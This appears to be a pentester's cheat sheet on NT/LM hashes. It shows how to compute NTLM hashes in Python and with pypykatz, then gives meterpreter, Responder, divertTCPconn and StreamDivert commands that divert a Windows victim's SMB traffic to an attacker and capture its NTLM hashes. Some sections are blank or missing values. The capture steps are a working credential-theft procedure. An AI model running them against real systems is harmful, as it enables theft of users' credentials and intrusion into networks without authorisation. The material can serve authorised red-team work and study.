NT / LM Hashes

Calculate NTLM

With Python:

>>> import hashlib
>>> hashlib.new('md4', 'Passw0rd!'.encode('utf-16le')).hexdigest()

With Pypykatz:

$ pypykatz crypto nt 'Passw0rd!'

Responder Capture Structure

[SMB] NTLMv1 Hash and [SMB] NTLMv1-SSP Hash capture structure:


[SMB] NTLMv2-SSP Hash capture structure:


Capture NTLM on Windows


Divert incoming SMB traffic on Victim to Victim's local port 8445, send it through a reverse-forwarded port (the meterpreter session must be elevated) to Attacker's local port 445, and capture the hashes with Responder:

$ sudo ./Responder.py -I eth0 -Av
meterpreter > portfwd add -R -L -l 445 -p 8445
meterpreter > execute -f divertTCPconn.exe -a "445 8445"


Divert all inbound TCP connections to port 445 (SMB) coming from to port 445:

Cmd > powershell -c "Add-Content conf.txt 'tcp < 445 -> 445'"
Cmd > .\StreamDivert.exe .\conf.txt -f -v
